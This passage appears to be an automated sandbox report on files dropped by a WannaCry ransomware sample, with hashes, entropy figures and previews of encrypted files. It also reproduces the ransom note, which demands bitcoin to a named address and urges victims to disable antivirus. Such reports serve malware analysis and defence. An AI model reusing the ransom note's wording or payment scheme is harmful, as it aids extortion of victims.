                                                                                      SHA-512:71CDAA68EBDA0E641D78F33710DF6BAB33AFBC0F60949A328FDCB9BAB551BA4B165E3226341E49B78B0A64BD5147806457103A6B59F5A4094780BA830EE6EF7E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........{..0]..s+F...5...t^D...-..D..$.I.%M...{g...,...7Zr..3.^E.9.U....n...(..../.w.;.P.[.c!........]..3..y.2.Fe&..`...i....8 .?........z.\.StK....DGC.//..~.......|XHC.q;.#Km.}.y..;....i....c.^].....*A"G..-E.a*.p.....@c..S....tJ.fjN[.I..5*1..k.<....................a..Q....g....d.....v..)|2.U._....P.QJ..o@Kv...Yr...R...R.......2..3;.....,..Hq..aN.d1...J.j..p..SRs...S.5.1L..w.X...1v.+.......!%.W.....LqH{.."p.[..$...m.t.w..N.ys.......p..3.0.t.@.>.K.....,..0.3..m..a....y.59.J.<|...rP..+Q"Ee..QL1J..}.|>.[..p...$.cY.m\x.h...>Y.hd......ChY..1...&.X ,.9OD.......:.6.B..0q...C........... ...B.,.-....I.yF.s...y.\..[d.o.........E8S6\wg.R.....kQ.c.].i..C.$...r....r..Ly...&.../.....R...N....#2..l.u..m.>9...Y..N..m(:K-3._..p.......K3.....[r.y.7H.=.w..i0b.: ...B..R.L......>.).{...E.".....v....{.h.....5.....[Z..Sg..+Q...Z......DA.,..B7...y...`:J..hzl..ff.;.T..i4O..i......q.z...^M..w....qKye.H%..].2..QO.#....Nu.. ....i....f...B.*......,.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.804028976211453
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:upSN4Fs+OToQ8AfPoyikIdYSC2PPhO4fsEYBn6Rcnls:u8N4FIToQ8CoHYSCu5vcnls
                                                                                      MD5:0DFEB107C7A07EFFC1CC35D22AE590CD
                                                                                      SHA1:361711F02BAFC5D3E3539A8EAFC2C379B877628C
                                                                                      SHA-256:0F8C4362E7A8D5D15DE83B1A2465DE42EBB16EA6F30120155B52BB72953B3E23
                                                                                      SHA-512:B0F4675E5BFF36DADD5A12DF891C14323CBC956D494F3750D58AE7370A0D5BCB5EB6C74A9408B0A54DFEB8DD095DEEE3C777F0BBF12FD0FCB2C1351704824768
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:i...4..OU~Z...w.m..S...3...^...P.n. ....6r.'...S....*B...nW4}y.>....;.}..g&.cX>....f...\~.b.(..4k.xOLY.\^....Q.......}....3i>....5.P.......7~P."..t.Y.RY|..Y..C.sS+.6z...hm.........^..V..........=>@..8.J..|.B..T.f......qc%B...{....*_.}u...[.l%...{......Q.b...}.5.:..:.f.V_;B.."j.J.......s/...:q,L.K.(.&.5S.......v.ID.3C...f.........F.4x.n.>.@.qNvHe.....H......3:5.e..!....!.TN...L.....m4K.......$..N...2.E.m.9....A...X.d.U.h..C..XvH...|.. %#K&8=.k.4.>.\zL.[..t......]B.UO...rL....i.../...d>W,.....S@.,...xp%R.-P.z....N.{..MO.s.....tU..n....=...'...*0..:.E..(.].....6.P.$....a/..3.+.p{.+..PR..}.]%..L...J1.....w..W.&:I$/.5.A..p/c.w.9.. .t4...Ol..%.5#RU"..?u.....y.7.E..`.9.(..."N.....Orb%v.I....gp;....9...tf..2.-T...dn..t..!.....$.(.+.......w...i8...]$...h..t..g..x1..1)..[.a..^..4.m..(k.9..!..I=..J..-dT.u^.S7.SMMx...5].....u..!...V..o.@.9(..c^"..lA..T...RcD7.J+..i..).^Y.......}.!CZ.B.r..N.& 6..B...@..Yv....@.@...x....C.Bl.m|5..<...a...h..)
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.823106919719574
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkcVLNuHKWpK8mqDDcKE4FjFuxhokmAH/HX+H43AtLv4dijLUM56gvN/xycl1o:bkcwXphm65EWFKhfVf+HqAb4ojLU3CXm
                                                                                      MD5:E427A085F6D82D88E717FE13498719D0
                                                                                      SHA1:069EBCDFEC69688340E8CBC1E1242607FBD4128E
                                                                                      SHA-256:18961566249B970CC7B96873D6BDACC7B9C0F4E9E8C5FAB1396E817ACB8FEB55
                                                                                      SHA-512:03007E26FCCADCA24FA8003134B1812742D297EB03C1DB973418B76032814615C2F23096C54C3501F67EB5FBA86570F36EAFBB9C33F1B6E28569EF53EB10BED4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..........#.9..D.m..(G.E w.t....9..J.....M... N9UA.....D7-.5.x.s3.A...1........\..........Ls...x^/.#.n.M.u-.Wb..../!.G [.../..;...r{hI8.=,.Gz0E|....^v@..@...n........<#6.]_.[.R=:.......].z...M.(.{...|...q:Y...0.*./4...6...<?..0.....~[73...g.v8...l.....................1'.q...f....U./@..*C..K.K..L..`,...}..d..oe....^.7..............t..T.:$\..XV>.[E.Y.}..Z.m..f.%.1.Q.HX.[......T.,L..C.....N.<f.8IOg....'s._...zI.h%.....c&G.c.."f..|RX5.Kd5..Q z.6..f._.fs,d...}.5...ow..).]Q3..y.;.1...EO.!6..bWS4\......[xK..J..b...(.+Pt..{......F...D0QyE.......6.'.2ji....P.k|..w......&.[....GA.oqO. .............=.oY...[.2."[.......a.@am1.-...D9.......%.LNc5.....x.b..,.o-.u...;h1D..S..z*.E........f.y^..F......|..(.Lqu.lbhz.C........l.../J....h8z'I..);8\....M....P..,.SpC..........=&`.x....L.5y.%e.:..8b ..@.:E..H...O.......@....1...$..+.....5.P[.....9..).k...}..^.Z.G.].H.~..V...#.C.A|J`..2.....l%.......{..W.R.(C.Q.k..,f.:..g.fJ/c.QrG1....$h...W...!......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.823106919719574
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkcVLNuHKWpK8mqDDcKE4FjFuxhokmAH/HX+H43AtLv4dijLUM56gvN/xycl1o:bkcwXphm65EWFKhfVf+HqAb4ojLU3CXm
                                                                                      MD5:E427A085F6D82D88E717FE13498719D0
                                                                                      SHA1:069EBCDFEC69688340E8CBC1E1242607FBD4128E
                                                                                      SHA-256:18961566249B970CC7B96873D6BDACC7B9C0F4E9E8C5FAB1396E817ACB8FEB55
                                                                                      SHA-512:03007E26FCCADCA24FA8003134B1812742D297EB03C1DB973418B76032814615C2F23096C54C3501F67EB5FBA86570F36EAFBB9C33F1B6E28569EF53EB10BED4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..........#.9..D.m..(G.E w.t....9..J.....M... N9UA.....D7-.5.x.s3.A...1........\..........Ls...x^/.#.n.M.u-.Wb..../!.G [.../..;...r{hI8.=,.Gz0E|....^v@..@...n........<#6.]_.[.R=:.......].z...M.(.{...|...q:Y...0.*./4...6...<?..0.....~[73...g.v8...l.....................1'.q...f....U./@..*C..K.K..L..`,...}..d..oe....^.7..............t..T.:$\..XV>.[E.Y.}..Z.m..f.%.1.Q.HX.[......T.,L..C.....N.<f.8IOg....'s._...zI.h%.....c&G.c.."f..|RX5.Kd5..Q z.6..f._.fs,d...}.5...ow..).]Q3..y.;.1...EO.!6..bWS4\......[xK..J..b...(.+Pt..{......F...D0QyE.......6.'.2ji....P.k|..w......&.[....GA.oqO. .............=.oY...[.2."[.......a.@am1.-...D9.......%.LNc5.....x.b..,.o-.u...;h1D..S..z*.E........f.y^..F......|..(.Lqu.lbhz.C........l.../J....h8z'I..);8\....M....P..,.SpC..........=&`.x....L.5y.%e.:..8b ..@.:E..H...O.......@....1...$..+.....5.P[.....9..).k...}..^.Z.G.].H.~..V...#.C.A|J`..2.....l%.......{..W.R.(C.Q.k..,f.:..g.fJ/c.QrG1....$h...W...!......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.8214463186226055
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:inyxeITaHHBC0dUeZlMbFMj3Bw+BQ2Xn7D/D5vg/Le6ugWdqtcn:ikuHBCIlz3BrO2X/J2CLB
                                                                                      MD5:14D8FF3AC91DF8B1484A38EAC8E5ED9B
                                                                                      SHA1:E8DE1DD1FC67FEE81E42152C9E3A400BC70E23A6
                                                                                      SHA-256:5C05CEB38FEA534DFA9AD4338B4F621FA02580F159A63B3AC70751EE3142F5DB
                                                                                      SHA-512:7869A903DCBAE92644CE5ED53394D44BCE818C7E8EA65A69F4DBA7EFF27BD7CB9F8DC170958EBFDD58A2150E6FFCBA28C3017DBE8A1CE5E30E1FFFBAA0B9D47C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.Lc.=.oTFEK...&..G.s..._.&..f.J.B.w$7Y.B/.Q...).5&...A.].<...p...,{......6..#..q.D.....!2...s..R..K.g....."x..b...2.G...K.:.Rk...{.Y.\........>n.....w.-.....~8e..c.......\.......rop.Ka..(...2.Z'..!......;L..../.{i.Y.z....!.....+(T.9....'..o......V3v.....5.x...]56.....}.n79..^......hkW..|X......!.............|.e.Rv.....R....uh9=.}.R4.Z.U..w....s...G.Py%/O$g....d..w..}...n...+~f...Ny......;....,9Z..Ho4.`...].@....,...........fd9..zL...`Z:.Vd.\...._..(._.g.._A...v....[fjI,GlVf.*......D.7....X.U.b[.....G..%..z..H...~.hR.., #.....F"...g./..\+.`.p^D.......F..w..!..#Dk.fp.fT0?[. .V.v..<..It.)t%......fg...M{WS.3.)DL.q.%.VA{.....)G....S...6..%.6..m...t3c..d...u.{..._.mG`.h.g).+.........b..v)...1......[jQ.Q...F..EC...>....!..+.`.b...R.}.n7......;..........m..{Z...W.@U.....snY.p.$"[XY.........p...CC.,......E.....Z7$..fE.hq....<.@.....Ik...+.../.....|...h..6FU...4..!]3..$R.......*....XQ...JL.a;....q|.J^|.n.._.C....#.'>...j....S...H...q./:..j..;.....W..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.826570388293041
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk3kxEsaOGlctCWZ1Jzc4j8aMDV+1Hycs78o9hZrYDdtnZdr2qcAMc:bk3kqfwC6PdHHycglrStXrrcZc
                                                                                      MD5:37300A3575F68B83613C0245AC5669B0
                                                                                      SHA1:67B8334F2552BAEA3C5FB07B56727AC44FE900E1
                                                                                      SHA-256:070E6DCE0FE505E3AFBCE124B2B891894B42406DF252DCA1187417B3ED685007
                                                                                      SHA-512:2825319E757E810DBD0E7DE0127972268510E5E47FAF407B2B38784B8A8B87D3CB18EB2266ADCCCB1C0AA3372398B738D107F4899CD8C6EBF0D436D92D2854E7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....7.p._b..:.7K.a...Q...M._.H...944.o...3V.+~..N.(<>..bI.}c8=.o..(....[].6..]5...e...{$.l....z....,..5.t.'(H...e......<*.}.E..]2x'Z.u>.W...."...t..b.J7Q._gT..].&..jw....ehp....!.l6....W...........Y.s../....=}..8...&..(.a...`......,.0..X.3%.1Bn..............cn3..P.%.m...).4..~.|0.;.@(.h@.v......4...........i....e.N.....+...f.....:W .B.BDg.U..v..3.p..8.%w;.L.'....,......9K..l|e..>..D.yA)..<...3...r....H.p".9]UW.....9../...Cq6:....<.....h.s..~...L-.>C/-V.B.....%.ud..p..t.....MqH(.....Y....*."n.h..W....X.yU.....7P..$;....0.!....tt.{rK..j!...7..;..o....ps....<..b.g....;V:....}..>.I.........^...$......J;.Dx..>.. .>"^zZ....X.f.J.:.+....\J..g...;d.3.D.CW.J.9.<..f..(.-.i.:y.PKB..C`(3X..k..V...U..q.-..\..T[}.W'B....5(4..06"qq.S.....:C.......|.. "U....K.E.l$..Z.=.C..;.g...Y:{...........>..".....q.&.*........<.=.o....eaE.[...N.3.k.:..`........jl.f...._V........h @(..r...n.5.5..=.2M.=c..y.Di..Wb.......M.E...-4.Ao#u`r...Z.&.....$
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.826570388293041
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk3kxEsaOGlctCWZ1Jzc4j8aMDV+1Hycs78o9hZrYDdtnZdr2qcAMc:bk3kqfwC6PdHHycglrStXrrcZc
                                                                                      MD5:37300A3575F68B83613C0245AC5669B0
                                                                                      SHA1:67B8334F2552BAEA3C5FB07B56727AC44FE900E1
                                                                                      SHA-256:070E6DCE0FE505E3AFBCE124B2B891894B42406DF252DCA1187417B3ED685007
                                                                                      SHA-512:2825319E757E810DBD0E7DE0127972268510E5E47FAF407B2B38784B8A8B87D3CB18EB2266ADCCCB1C0AA3372398B738D107F4899CD8C6EBF0D436D92D2854E7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....7.p._b..:.7K.a...Q...M._.H...944.o...3V.+~..N.(<>..bI.}c8=.o..(....[].6..]5...e...{$.l....z....,..5.t.'(H...e......<*.}.E..]2x'Z.u>.W...."...t..b.J7Q._gT..].&..jw....ehp....!.l6....W...........Y.s../....=}..8...&..(.a...`......,.0..X.3%.1Bn..............cn3..P.%.m...).4..~.|0.;.@(.h@.v......4...........i....e.N.....+...f.....:W .B.BDg.U..v..3.p..8.%w;.L.'....,......9K..l|e..>..D.yA)..<...3...r....H.p".9]UW.....9../...Cq6:....<.....h.s..~...L-.>C/-V.B.....%.ud..p..t.....MqH(.....Y....*."n.h..W....X.yU.....7P..$;....0.!....tt.{rK..j!...7..;..o....ps....<..b.g....;V:....}..>.I.........^...$......J;.Dx..>.. .>"^zZ....X.f.J.:.+....\J..g...;d.3.D.CW.J.9.<..f..(.-.i.:y.PKB..C`(3X..k..V...U..q.-..\..T[}.W'B....5(4..06"qq.S.....:C.......|.. "U....K.E.l$..Z.=.C..;.g...Y:{...........>..".....q.&.*........<.=.o....eaE.[...N.3.k.:..`........jl.f...._V........h @(..r...n.5.5..=.2M.=c..y.Di..Wb.......M.E...-4.Ao#u`r...Z.&.....$
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.824762449472419
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:sLgXv/A0CjC8xJZjcLCYW5ReblwSR+garxQ4ptZkN:NnYC8jjcuoREVBpte
                                                                                      MD5:4700F8B5C45489DAD717160B9F335A26
                                                                                      SHA1:3FF83E76096FFB4238B06184D93320C35B53EC05
                                                                                      SHA-256:443C4C35CDC89EBCCF2F7FFCB80A21A1D02EB2B368FEFB809DEFDDCF5AB46FCE
                                                                                      SHA-512:BAE0B7EED53196BE30D7C46CA55FE3519D9CF7A7707DE4B45642B24FE9076BF9C44EEF2F4D8C32DFFF2C7C5C5A677F76A264D5FCF75F57BE47919C4541AD79FF
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.d...e.Q.m..X.....[~....(.#......W.@..>{t!.r.. 6.U.d.FgM...0m..]*.P....... &y...O|_....:..d9t.z.).....W..a.S.5.^.e ....L.T...%....=)...~A..W....+9. .#.a.=..* .V.l6..g..2.>.xl..F..M..o..=R.......Pe.b..;..........I...5..'%.98.U.?..'r-{..t6y..a.h...;/.V..y.=...Ir.,"!......VR......C.8.I..c.C./....J)s'.2X.....p...4..%mz.U........B.....VR^..Oo..@?.p...7/...F...Q.{.../(.._.'].[.Ld.....GN.&eXc..}...#.].@.j.qRX...<...EJ....W%L./0a.9.*.X.!.:.a.....v4i8.,.....3GGnp[...A$Ds.g-...gI..[4.V.'Z.?D....9.FB.).KSR....\]..g.#...7..U.mZ\L....q.T?..77).[u....s@).F.p..vU.?.a...)D9I..^H?g...8..MG....e...+...xwt.b.{x.......u.ae`.5.B.?...16...#.|._..*.1\........W..{....I............6y........kT...2...;T.<.}m...#....^..a.I=.0..f.......ZW=$...K9SS...*.e3.t......p.}R....j...Y.,CT......Q...g..r.1s.n....Ex.H.M..#.-F.HB...%.m-7bK.u...)D.Hcn.5.C.........k.>lA...?$b..-=Fh.~*p.i-....)..).h....> L!..^...t.../37$4~[v^.c..A0.....@..(......j..Z..............Kb.........M.>."
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.83645015527598
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bksthP2s4LV+VY7kgsLKzEfkRYjt0VgabXx11CskbkqqTcVValNut1m:bksvtmV+CgQz7Yx0vTx11QbA9NYm
                                                                                      MD5:D1F8EAA4DCE7832D2E582EF3B64F9C46
                                                                                      SHA1:9D8F6DA6383470B8EB8FBE32A25AD87A2EB87092
                                                                                      SHA-256:4CB32CA4424AB68F597D6F6C42BA3344DC4156B6834AF3E8FB0E17C6E78F15C3
                                                                                      SHA-512:17CC217FCD7C2B50A4E9598B351F81918DB381D021E9D8278C7C9935DD7E4AEA9E54689636547E4B53FD732CCCAD376D282ABBBCD657B5B8BF8EB5797FDFE823
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....y.M....}.k..>......E!..[...]!l...|...$5....w.[G.*...dv"$Xb.H.wmB'.D`.c..w.xK.|.:*@....R...g...]&MF....F..:q?...f]..[.W..q.W.!k.x....&.\!M'[M....`<"`.go.Y.Q.I.~.RgW.T........o......`.R..&..e.hy.)_.mZ.....<...G.d.jH....rp.rQ..a).........G.T.M7.|.:............/....F'../.%.[....A......'.U.........i....|..+.......\.&Q..s..ZS.-....0....R..<`....>....).K.\...`....p{....p...-1.k.V...8..6..C.6..X.@aygD<.}..u.u..K.'<........9.x.Ua.k4j..\.X."....wZS(.......k-.{.26.2......{.....O.w..8.v](.>..X.....r.......].i.0w.I......L6#a9I....z.Q.Y2...+.H......dDH.(...4.Cz.._.f....+........~.....9....B..I....C.....=...-.b.)..D[df.(...<.[j.#........kV.`.6..`.6.H.\.s.".....?.....Z.nQ...n.N\......<oOUs..'uf]*....:j.+rI.T{.........?..~.Q/J.TN..5...F9....$..f....U..t.g..`...:.l.g....EU].=l.s...s..p.'.Z.!.k9 $...&.q:..C.@.-<...O...K...!._.Q.Xh.!.^)...S.d.G......%.~..-.2@....0...c...%l...M.>.r3.I.>v.2d...S(:x}.".....6...]J.....-p.k.../O.6.~.......m..VG
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.83645015527598
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bksthP2s4LV+VY7kgsLKzEfkRYjt0VgabXx11CskbkqqTcVValNut1m:bksvtmV+CgQz7Yx0vTx11QbA9NYm
                                                                                      MD5:D1F8EAA4DCE7832D2E582EF3B64F9C46
                                                                                      SHA1:9D8F6DA6383470B8EB8FBE32A25AD87A2EB87092
                                                                                      SHA-256:4CB32CA4424AB68F597D6F6C42BA3344DC4156B6834AF3E8FB0E17C6E78F15C3
                                                                                      SHA-512:17CC217FCD7C2B50A4E9598B351F81918DB381D021E9D8278C7C9935DD7E4AEA9E54689636547E4B53FD732CCCAD376D282ABBBCD657B5B8BF8EB5797FDFE823
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....y.M....}.k..>......E!..[...]!l...|...$5....w.[G.*...dv"$Xb.H.wmB'.D`.c..w.xK.|.:*@....R...g...]&MF....F..:q?...f]..[.W..q.W.!k.x....&.\!M'[M....`<"`.go.Y.Q.I.~.RgW.T........o......`.R..&..e.hy.)_.mZ.....<...G.d.jH....rp.rQ..a).........G.T.M7.|.:............/....F'../.%.[....A......'.U.........i....|..+.......\.&Q..s..ZS.-....0....R..<`....>....).K.\...`....p{....p...-1.k.V...8..6..C.6..X.@aygD<.}..u.u..K.'<........9.x.Ua.k4j..\.X."....wZS(.......k-.{.26.2......{.....O.w..8.v](.>..X.....r.......].i.0w.I......L6#a9I....z.Q.Y2...+.H......dDH.(...4.Cz.._.f....+........~.....9....B..I....C.....=...-.b.)..D[df.(...<.[j.#........kV.`.6..`.6.H.\.s.".....?.....Z.nQ...n.N\......<oOUs..'uf]*....:j.+rI.T{.........?..~.Q/J.TN..5...F9....$..f....U..t.g..`...:.l.g....EU].=l.s...s..p.'.Z.!.k9 $...&.q:..C.@.-<...O...K...!._.Q.Xh.!.^)...S.d.G......%.~..-.2@....0...c...%l...M.>.r3.I.>v.2d...S(:x}.".....6...]J.....-p.k.../O.6.~.......m..VG
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):933
                                                                                      Entropy (8bit):4.711824502619554
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                                                      MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                                                      SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                                                      SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                                                      SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Mar 23 13:47:49 2024, mtime=Sat Mar 23 13:47:49 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1189
                                                                                      Entropy (8bit):5.040493253287504
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:88qLHOLm86eCRBlgK21Z5bpEO9l7vQAPic3qygm:882HOLm8iRyv17vPQyg
                                                                                      MD5:702D04031DD9BF002906D9511CD8FA24
                                                                                      SHA1:332DBCC83F66AEE905A99AE92416F189CFCF545F
                                                                                      SHA-256:704A9F74AA11DF406AF01B1B417E5BEC073220739AA562F76DC18804C04F7BD4
                                                                                      SHA-512:6D246DCDDF79E7EC911A80C6F8DA38B292A79946B01C1E4BCED43347649018A7BCFD29812D8DC6DE61672F013246F571C1F7C07C7309E20DD3A13154788FEB8A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:L..................F.... ....{Q.1}...'g.1}...X.H............................X.:..DG..Yr?.D..U..k0.&...&.........{4.....S.0}....q.1}......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.HwX.u..............................A.p.p.D.a.t.a...B.P.1.....wX.u..Local.<......FW.HwX.u...........................M..L.o.c.a.l.....N.1.....wX.u..Temp..:......FW.HwX.u..........................O...T.e.m.p.......1.....wX.u..TEMP1_~1.ZIP..l......wX.uwX.u....c.....................?.o.T.e.m.p.1._.R.a.n.s.o.m.w.a.r.e...W.a.n.n.a.C.r.y...z.i.p.....t.2......J.. .@WANAD~1.EXE..X......wX.uwX.u.....Y........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......................-...........................C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.........|....I.J.H..K..:...`.......X.......134349...........hT..CrF.f4... .P.............%..hT..CrF.f4... .P.............%.............1SPS.XF.L8C.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.805636096650943
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:boHmQOBTz2XBEnet8tvsRhT7Z5SdhGpLuhpb:bTz2xEnety0RVFYdhGlG
                                                                                      MD5:FB99F8A524B053E740FBAE3C04DA56D1
                                                                                      SHA1:6DC54C75AFB011EE583D03525CC2EB38DCC726FA
                                                                                      SHA-256:80B20AAC7B0EC90B70A599C35EF1E691DD4681E32D21F65DB5EAAAADB46B89F9
                                                                                      SHA-512:79F68946E8C64A8EF3F7F3A798946D390979AB2EF525421DB2DBD39573E59EB5663C516BD0BD3A5EA0741DC1019E58357CF55B2B08FEB2DA5C5EA02AB861D06B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.H..O.D.<...I%e.(.....q./@......E........Rb....m.L+@o~..H.[.+j.}{0.HKK_`q.!]x. ..|.....Zf.......=.....tX.d...AP.V.8.h..g..g.0..O.&}.R4.(.!.y."..h...l....Afb...e...{b../Mh.c.?....4....<2...K. ...%..y..T...}A..U$..........].G."Y...~....|..L..>.EpT.....^.e......oG:Q.+.0.xy....3.+.@..3.."..P...3K.8.\...V..@.....<.&.G.}.u...X.!.....&........3...=......Bw.X..........t....Ma.%%D.d./..Q.*..)...K.XD....(.4.....s.[r/............,.j..6.:.......2.....F.....W%x.sW~K.]..V..........4g.`..K......R.j..n..&L.Q.P...AIv.O!.I4.h.......Y......%.g.n..D...3....O..9......#.\g....+.~m..:....Ko...H|O..%..~..I....1.}.y3Y.jh..2.s.p...c.W...k..<m..n.(gd*r.d.V.3..R.:. ...g.#6.....4.IU.Mjk..Z$..z....o.@#...6p.t.V....`.<..3d.20I.....I0.9y.r...~...XR.]...^.^X.=bZiKp2.uTbX.../.\.....)..'H.`.B.]7.mk.R<.4..6.G./.a...$.,....F...NO.((@.O5.(.D.E....#"..k..'=.lj.D...B...E\I....#S..U..w%.........(6ps.\l.....01..!uj..c...k..a.[-.H.....*w...=.|-<.4OQ..$...#M......D9{J.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.86251011950763
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkE1T7tUJpCOvg8w3t5b/3P8ckg4zQRVQCLp/GgD81Tk0tvv6Nf4j9Ulb5PrEs4m:bkQcvM3/b/aHzQRVQCl//1m36NAjWb5R
                                                                                      MD5:0DBD778E464173D29DCA9A335BA87BA3
                                                                                      SHA1:B647E0865AF65DB746012EC517579DD7E6E00FEB
                                                                                      SHA-256:70E46519F924D51E2011EA8EB76DDB068AB44572C5AD7CCE3AFDCBA8AE1154BE
                                                                                      SHA-512:65F9C6E5CFB33ED6C136F86B70DD7910719927BB3DADE3A8377C255E2188F280579FDEF4AB3731AE1CD56A77E43B4D1BEBB0C23DC96BE820407E8403A4E274B1
                                                                                      Malicious:false
                                                                                      Reputation:low
